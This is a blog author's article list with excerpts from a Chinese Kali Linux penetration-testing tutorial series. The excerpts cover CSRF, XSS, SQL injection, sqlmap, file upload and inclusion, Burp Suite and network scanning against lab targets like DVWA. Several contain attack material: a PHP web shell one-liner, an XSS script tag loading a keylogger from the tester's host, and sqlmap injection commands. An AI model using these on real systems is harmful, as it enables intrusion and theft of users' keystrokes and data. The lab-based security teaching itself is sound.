kail
文章平均质量分 73
小依真
这个作者很懒,什么都没留下…
展开
-
第十三章—手动漏洞挖掘(十 一)——CSRF
CSRFcsrf——跨站请求伪造从信息的角度来区分:xss:利用用户对站点的信任csfr:利用站点对已经身份认证的用户端的信任1.概述原理:客户端访问服务器端进行登录进行了身份认证,有了一个合法的session,此时如果客户端用户误点击了hack给他的链接这种请求,便会执行请求并把该请求发送给服务器端,而这个请求是利用他现有的合法的session身份来进行提交的,在服务器端看来,该请求有合法的身份验证,便会认为该请求是正常的请求。但是hack也不知道客户端是否点击了该请求,只能等待,如果该请求原创 2021-04-12 14:38:43 · 419 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(十)——XSS(三)
存储型XSS1. 概述反射型xss和存储型xss的区别是:反射型xss需要一系列的社会工程学等各种欺骗方式诱使别人点击你发送给他的连接地址,利用起来较麻烦。存储型xss漏洞利用之后造成的威胁性更大,利用难度也较容易一些。存储型xss,利用代码长期存储在服务器端。渗透测试者一次性发起漏洞利用代码后,利用代码就会注入到服务器存在漏洞的页面,之后每当有人访问该页面,都会从服务器下载这段攻击性的代码脚本,在本地浏览器中执行。只要渗透测试者攻击后开着主机侦听端口等待有人访问该网页,就会像钓鱼一样上钩,客户端原创 2021-04-09 15:10:55 · 980 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(十)——XSS(二)
XSS(二)1.场景:键盘记录器1.1 环境准备#要执行的指令,10.0.0.140是kail这台虚机的ip,我们需要在该虚机上新建一个keylogger.js脚本文件<script src="http://10.0.0.140/keylogger.js"></script>#因为我们要把keylogger.js文件放到apache下,所以在创建keylogger.js脚本文件前,我们需要查询80端口是否被占用netstat -pantu | gerp :80#如果查原创 2021-04-07 17:06:02 · 344 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(十)——XSS(一)
XSS —— 跨站脚本漏洞xss(cross-site scripting)跨站脚本漏洞,其漏洞还是存在于服务器端,但与之前漏洞不同的是,他攻击的对象不是服务端,他利用漏洞攻击的对象是网站站点的使用者即客户端。原理:一些黑客可以把有恶意的javascript代码注入到服务器上,可能是一次性注入,也可能是持久性注入,服务器端就会吧这些代码不做任何修改直接交付给客户端浏览器,一旦脚本代码存在恶意目的,到达了客户端浏览器去执行的话,就会实现客户端的一个攻击。但是javascript在浏览器中使用权限比较受限原创 2021-04-02 11:54:53 · 257 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(九)—— Sqlmap自动注入(四)
Sqlmap自动注入(四)原创 2021-03-26 16:12:47 · 211 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(九)——SQLMAP自动注入(三)
Sqlmap自动注入(三)1.Optimization参数Optimization——优化#相当于把--predict-output、--keep-alive、--null-connection参数都加上了-o #预设的输出。根据检测方法,对比返回值和统计表内容,不断缩小检测范围,提高检测效率,与--threads参数不兼容#可以检测版本号、用户名、密码、privileges、role、数据库名称、表名、列名#find / -name common-outputs.txt查看到统计表文件位置为原创 2021-03-25 21:25:45 · 245 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(九)——SQLMAP自动注入(二)
sqlmap自动注入(二)—request--data#post方法,原https://1.1.1.1/a.phpsqlmap -u "https://1.1.1.1/a.php" --data="user=1&pass=2" -f#get方法,原 https://1.1.1.1/a.php?user=1&pass=2sqlmap -u "http://1.1.1.1/a.php" --data="user=1&pass=2" -f...原创 2021-03-25 10:20:24 · 381 阅读 · 4 评论 -
第十三章—手动漏洞挖掘(九)——SQLMAP自动注入(一)
sqlmap自动注入(一)原创 2021-03-11 15:48:33 · 307 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(八)——SQL盲注(三)
sql盲注前面讲的sql注入内容都是基于输入错误的sql语句,服务器会返回数据库内建的报错信息,所以我们可以猜测他的数据库是怎么构造的。当程序员隐藏了数据库内建报错信息,替换为通用的错误提示,sql注入将无法依据报错信息判断注入语句的执行结果,即盲。思路:既然无法基于报错信息判断结果,我们可以基于逻辑真假的不同结果来判断。1' and 1=1-- 1' and 1=2-- 结果为假时,无内容显示。1' order by 5-- 1' order by 2-- 1.有权读取inf原创 2021-03-08 14:19:31 · 207 阅读 · 1 评论 -
第十三章—手动漏洞挖掘(七)——SQL注入(三)
SQL注入(三)一、当数据库不可写前两章讲的,都是基于读取information_schema库,该苦必须是root权限才有读写操作权。如果是一个安全意识很好的运维人员,他有可能创建一个用户权限较低的普通账号来运行mysql数据库实例,此时即使应用存在sql注入漏洞,通过他也无法查询information_schema库,前两章的大多数函数就无法使用了。也有可能存在union、order by语句也无法使用的情况。此时我们就需要尝试其他方法。可以通过sql的逻辑判断进行猜测。该root不是操作系原创 2021-03-05 10:16:36 · 243 阅读 · 1 评论 -
第十三章—手动漏洞挖掘(六)——SQL注入(二)
一、读取文件原创 2021-03-04 14:14:46 · 311 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(五)——SQL注入(一)
lsb_release -a #查看kail的运行版本SQL注入服务器端程序将用户输入参数作为查询条件,直接拼接sql语句,并将查询结果返回给客户端浏览器。原创 2021-03-01 16:48:03 · 470 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(四)
文件包含远程文件包含:可以使用kail下的/usr/share/wfuzz/wardlist/vulns下有专门针对类unix或windows系统的目录遍历使用的字典。文件上传漏洞设置DWVA安全级别为low打开DVWA的文件上传功能,正常上传成功效果如下图:现在我们创建一个php文件:<?php echo shell_exec($_GET['cmd']);?>我们尝试上传该php文件。上传成功,我们使用该url进行测试,发现被成功执行:我们使用burpsui原创 2021-01-19 17:11:07 · 239 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(三)
文件遍历Directory traversal / 文件包含File include目录权限限制不严 / 文件包含环境:metasploitable操作:修改php配置文件,将allow_url_include修改为on,就会允许我们include其他的url地址到webapplication的相关参数里进而执行,从而导致远程文件引用这个漏洞出现。vi /etc/php5/cgi/php.ini#重启apache,重启后,有漏洞的配置才会生效/etc/init.d/apache2 restart原创 2021-01-19 11:44:50 · 172 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(二)
身份认证面对web application的登录。原创 2021-01-18 10:48:39 · 526 阅读 · 0 评论 -
第十三章—手动漏洞挖掘(一)
手动漏洞挖掘(一)原创 2021-01-11 17:15:57 · 1134 阅读 · 0 评论 -
第十三章——Burpsuite三(Repeater、Sequencer、Decoder、Comparer、Options)
BurpsuiteRepeater1.Repeater 使用可以右键将请求发送到repeater:发送到repeater后可以手动修改并点击send进行请求的重复提交。对于凡是有变量的地方,我们都可以修改内容对其进行一个注入,发送请求,根据返回的结果进行判断是否存在某种漏洞。2.数据包右键菜单(1)改变请求方式点击send发送请求后会收到回复。raw:返回原始数据headers:头部分Hex:十六进制的形式显示Html:以Html源码进行显示,不显示头Render:对页面进行渲原创 2020-09-17 14:33:39 · 607 阅读 · 0 评论 -
第十三章——Burpsuite二(Dashboard、Intruder)
Burpsuitespider原创 2020-09-16 14:22:45 · 2999 阅读 · 0 评论 -
第十三章——Burpsuite一(安装、proxy、target)
Burpsuiteweb安全工具中的瑞士军刀。Burpsuite是一个强大web漏洞挖掘工具,截断代理,解码和编码,Fuzzy进行各种注入和暴力破解 插件扩展,有多个模块。PortSwigger公司开发,有Burp Free版和Burp Professional版。Free版完全是一个手动漏洞挖掘的工具,没有主动扫描、主动探测漏洞、自动发现漏洞、自动报警漏洞这些。和Professional的区别就是没有主动扫描工具。官方网站:http://www.portswigger.net。所有的工具共享一个原创 2020-09-14 17:14:50 · 376 阅读 · 0 评论 -
第十三章(三)—WEB渗透(skipfish)
skipfishC语言编写,谷歌开发的一款工具。实验性的主动web安全评估工具。重点关注的是web代码。基于字典对目录探测。优点:速度较快:使用多路单线程,全异步网络I/O,消除内存管理和调度开销;启发式自动内容识别。误报较低skipfish -o 目录 http://1.1.1.1 #-o:扫描结果存放到目录下skipfish -o test @url.txt #url.txt里存放你要扫描的多个文件目标,通过命令一次性调用skipfish -o test -S complet.wl原创 2020-08-31 15:39:19 · 240 阅读 · 0 评论 -
第十三章(二)—WEB渗透(扫描工具NIKTO)
1.实验环境metasploitableDVWA下载安装下载地址:https://sourceforge.net/projects/metasploitable/用vm打开.vmsd文件,如果遇见需要配置文件什么的,就用vm打开vmx文件。开启虚拟机,账号密码都是:msfadmin网络配置保证kail和metasploitable两个虚机处在同一个网段。kail:metasploitable:测试一下是否能互相ping通。默认情况下,metasploitable上webap原创 2020-07-24 11:43:48 · 586 阅读 · 0 评论 -
第十三章(一)—WEB渗透(HTTP协议基础)
WEB攻击面networkosweb serverapp serverweb applicationdatabasebrowserHTTP协议基础明文没有任何内建的机密性安全机制。嗅探或代理截断可查看全部明文信息。https只能提高传输层安全。只是在传输过程中起到加密作用。对于服务器端和应用程度端代码漏洞是没用的。https也是可以被中间人劫持窃取监听的。无状态每一次客户端和服务器端的通信都是独立的过程。web应用需要跟踪客户端会话(多步通信)。不使用cookie原创 2020-07-23 10:37:08 · 296 阅读 · 0 评论 -
第八章(三)—漏洞扫描(openvas)
nmap脚本nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。/usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放cat script.dbless script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类smb-vuln-ms10-061.nse这个脚本是stuxnet蠕虫利原创 2020-06-05 15:51:39 · 5460 阅读 · 0 评论 -
第八章(二)—漏洞扫描(nmap脚本使用)
nmap脚本nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。/usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放cat script.dbless script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类smb-vuln-ms10-061.nse这个脚本是stuxnet蠕虫利原创 2020-06-05 15:38:41 · 8174 阅读 · 0 评论 -
第八章(一)—漏洞扫描(基本概念)
基于端口服务扫描结果版本信息(速度慢)搜索已公开的漏洞数据库(数量大)使用弱点扫描器实现漏洞管理原创 2020-06-01 17:20:35 · 2144 阅读 · 0 评论 -
第七章(十四)—主动信息收集—nmap参数介绍
NMAP1.主机发现相关参数-iL #把不连续的ip存成一个文件做成一个ip地址列表文件,iL后面跟该地址列表文件#如:nmap -iL iplist.txt-iR #随机选择目标,不用指定扫谁,nmap会帮你随机的指定目标去扫谁,后面要跟要扫目标的数量,#如:nmap -iR 10 -p22,即随机扫10个目标--exclude #如果选了一个iP地址段,但有些ip又不想扫,可以使用该参数把不想扫的ip剔除掉#如: nmap 192.168.1.0/24 --exclude 192原创 2020-05-28 15:24:23 · 421 阅读 · 0 评论 -
第七章(十三)—主动信息收集—WAF识别
WAF识别WEB应用防火墙。Web应用防护系统(Web Application Firewall, 简称:WAF)代表了一类新兴的信息安全技术,用以解决诸如防火墙一类传统设备束手无策的Web应用安全问题。WAF是指通过一系列针对HTTP/HTTP5的安全策略专门为web应用提供保护的产品。它主要用于防御针对网络应用层的攻击,像SQL注入,跨站脚本攻击、参数篡改、应用平台漏洞攻击、拒绝服务攻击等。同传统的防火墙不同的是,web应用防火墙位于两个或多个网络之间,它们是实施网间访问控制的一组组建的集合,内原创 2020-05-28 11:40:50 · 364 阅读 · 0 评论 -
第七章(十二)—主动信息收集—负载均衡识别
负载均衡识别分为两大类:广域网负载均衡他的原理就是DNS,简单的方法就是使用DNS轮询来进行负载均衡。当你访问一个域名时,同一个域名会被解析成多个A记录解析到多个ip地址上。服务器负载均衡基于web的服务,经常使用的是nginx、apache这种应用层的负载均衡。当然也可以使用一些负载均衡设备去实现。目的:在扫描探测的阶段,我们也有必要发现一下目标域名被解析到多少个服务器,这些歌服务器有可能因为管理员的配置不善,不同的服务器之间他们的安全防护是不一样的,配置也不一样,有的ip可能就会存在原创 2020-05-28 11:40:34 · 537 阅读 · 0 评论 -
第七章(十一)—主动信息收集—防火墙识别
防火墙识别目的:通过发送的扫描数据包,不引起防火墙的告警,同时还能根据他的回包识别出防火墙上过滤了那些端口。这些过滤的端口就不是在防火墙上开放的端口。原创 2020-05-28 10:38:27 · 265 阅读 · 0 评论 -
第七章(十)—主动信息收集—SMTP扫描
SMTP扫描SMTP:25端口目的:发现目标系统的邮件账号。初级的方法:nc -nv 1.1.1.1 25 VRFY root #使用该命令去确认是否nmap smtp.163.com -p25 --script=smtp-enum-users.nse --script-args=smtp-enum-users.methods={VRFY}#--script-args=smtp-enum-users.methods=指定使用什么方式做用户账号的枚举smtp-user-enum -M V原创 2020-05-27 17:35:57 · 676 阅读 · 0 评论 -
第七章(九)—主动信息收集—SMB扫描(nmap、nbtscan、enum4linux)
SMB扫描SMB:Server Message Block协议。SMB协议最早由微软开发,是一个特有的协议,后来由于SMB使用范围越来越广,Linux也去兼容了SMB协议,可以进行一些跨系统协议的互通。他是安全问题最多的协议实现复杂微软系统默认开放文件共享,是通过SMB来实现的空会话未身份认证访问(SMB1)SMB1.0的漏洞,即不用账号密码,也可以跟目标系统建立一个空连接,基于这个空连接,可以获取到目标系统的密码策略、用户名、组名、机器名、用户、组SID。注:windows默认开放1原创 2020-05-27 15:52:10 · 1370 阅读 · 0 评论 -
第七章(七)—主动信息收集—操作系统识别(TTL起始值、nmap、xprobe、被动识别p0f)
操作系统识别目标:通过对操作系统的扫描,识别操作系统的类型和使用的版本。目的:扫描端口后面服务的目的是发现应用服务的版本;通过应用服务版本的信息来判断这个版本上是否存在有漏洞,如果存在漏洞的话,我们可以利用这些漏洞进行渗透测试。无论是windows、linux、unix,默认安装之后,都会默认开放一些端口,通过扫描操作系统的版本,可以识别这些默认开放的服务和端口上面存在的漏洞,可以利用操作系统本身自带的漏洞,也有可能进入到目标系统。操作系统识别技术:种类繁多,最简单的识别方法是通过ttl值。原创 2020-05-27 11:10:16 · 877 阅读 · 0 评论 -
第七章(八)—主动信息收集—SNMP扫描(onesixtyone、snmpwalk、snmpcheck)
SNMP1.概述SNMPSNMP叫做简单网络管理协议,他的通信走的是UDP的161、162。SNMP的服务端,也就是信息被查询的被管理端使用的是UDP的161端口,客户端使用的是162端口。和DHCP协议有点像,DHCP也是基于UDP之上的应用层的协议,DHCP使用的是67、68,服务端使用的是67,客户端使用的是68。SNMP是网络管理员配置起来最最容易疏漏的一项服务。当你的网络稍微有点规模的时候,通过人工去进行网络设备运行情况的监控的话,效率会低,所以需要引入基于SNMP协议的一些监控机制,原创 2020-05-27 11:10:32 · 2078 阅读 · 0 评论 -
第七章(六)—主动信息收集—服务扫描(Banner、服务识别)
服务扫描找到了活着的ip、找到了开放的端口,下一阶段就是去识别开放端口上运行的应用。识别开放端口上运行的应用根据识别到的应用程序软件信息、版本,我们可以到相应的软件官方网站上去查找,如果是老版本的,可以去官方网站查找公布出来的老版本上存在的一些漏洞,这些漏洞就可以被利用,找到这些信息,就可以有针对性的找到利用代码,自己去发掘他的利用方式,可以用逆向工程、模糊测试的方式去发现漏洞及利用方法。识别目标操作系统有些操作系统自带的服务上面也会存在一些漏洞。识别他是windows还是linux,版本是原创 2020-05-26 11:22:09 · 1358 阅读 · 0 评论 -
第七章(五)—主动信息收集—端口扫描(基于TCP全连接扫描、隐蔽扫描、僵尸扫描、UDP的端口扫描)
端口扫描端口对应网络服务及应用端程序服务端程序的漏洞通过端口攻入发现开放的端口更具体的攻击面UDP端口扫描向某一端口发送UDP数据包,如果目标ip给我一个ICMP prot-unreachable响应,代表端口关闭。没有响应没有结果,我认为他是开放的。**注意此时扫描的ip在发现阶段是已经确认是活着的。**做UDP扫描,不外乎就是端口开放了和没有开放两种状态。UDP的扫描结果准确性还是比较高的,但是因为有六万多个端口等着,需要每一个端口进行探测,所以耗时巨大。但是TCP更耗时。1.sc原创 2020-05-25 15:10:56 · 1013 阅读 · 0 评论 -
第七章(四)—主动信息收集(基于TCP、UDP的四层发现)
四层发现1.概述四层就是TCP、UDP,都有很多端口,虽然称之为四层发现,我们使用的也都是针对四层端口的探测来识别主机是否是在线状态,但是四层发现并不对端口状态进行识别。对端口状态识别是对端口扫描。四层发现本质上是利用四层的通信来识别目标主机、目标ip是否是在线状态,所以最终目标还是停留在ip是否在线的层面。而并没有上升到端口是否开放的阶段。四层发现优点:可路由,四层发现比三层发现结果更精准,三层发现基于ICMP协议,而四层发现会通过TCP、UDP探测相应的端口,根据相应的端口给我们返回的结果来判原创 2020-05-22 10:56:16 · 334 阅读 · 0 评论 -
第七章(三)—主动信息收集(ping、traceroute、scapy、nmap、hping三层发现)
三层发现二层发现使用的技术是arp协议。三层使用的是IP、ICMP协议。ICMP协议:internet控制管理协议,用来做网络的控制管理使用的。主要的作用是进行一些路径的发现、主机网络通断的侦测。三层协议优点:可路由速度比较快。缺点:速度比二层慢经常被边界防火墙过滤。发数据包,但是目标机器没有给我相应,我的扫描软件就会判断目标机器是不在线的状态,就会出现错误的判断结果,这是无法回避的问题。1.pingping命令使用的是ICMP的其中两种类型的数据包。ICMP协议会根据ICMP包原创 2020-05-16 16:12:33 · 569 阅读 · 0 评论 -
第七章(二)—主动信息收集(netdiscover、scapy做二层发现)
二层发现1.Netdiscover工作场景更加丰富专用于二层发现可用于有线和无线的网络环境下可以实现主动和被动的发现主动发现netdiscover -i eth0 -r 1.1.1.0/24netdiscover -l iplist.txt#这两个命令类似于nmap的二层发现命令主动式的扫描总是会引起网络管理员的注意,netdiscover也支持被动发现。被动发现他不主动发arp包,只是在网络里默默侦听。原理就是把自己的网卡制成混杂模式,他就可以收取非本网卡ip地址、非本网卡原创 2020-05-16 14:22:47 · 353 阅读 · 0 评论 -
第七章(一)—主动信息收集(arping、fping、nmap做二层扫描)
主动信息收集**被动信息收集的原则:**不直接和目标系统进行信息交互。主动信息收集:直接与目标系统进行交互通信。主要过程就是向目标系统发送大量的请求进行探测,将他所有开放的服务、端口信息以最精确的状态收集上来。该过程会不可避免的在目标系统的日志记录里留下访问的痕迹。如果目标系统的管理员有较强的日志审计及抓包分析的能力,他是可以通过分析我们留下的信息确定是我们对他的系统发起了大量的主动信息收集的探测性活动。使用受控的第三方电脑进行探测为了避免我们在主动信息收集阶段就暴露自己,所以在原创 2020-05-15 15:14:54 · 898 阅读 · 0 评论 -
第六章(九)—信息收集(recon-ng)
Recon-ng全特性的基于web的侦察框架,是基于python开发的web信息搜索框架。DNS信息、各种联系人的信息、各种邮件地址、域名注册信息、以及web页面里关于这家公司的各种各样的信息收集内容都可以在这一个框架里完成,这一个小小的工具就实现了完整的被动信息收集的可能性。使用方法:模块数据库报告通过集成的模块来实现的,每个模块都是通过本地命令行工具去调用不同的搜索引擎,用不...原创 2020-04-17 14:42:52 · 423 阅读 · 0 评论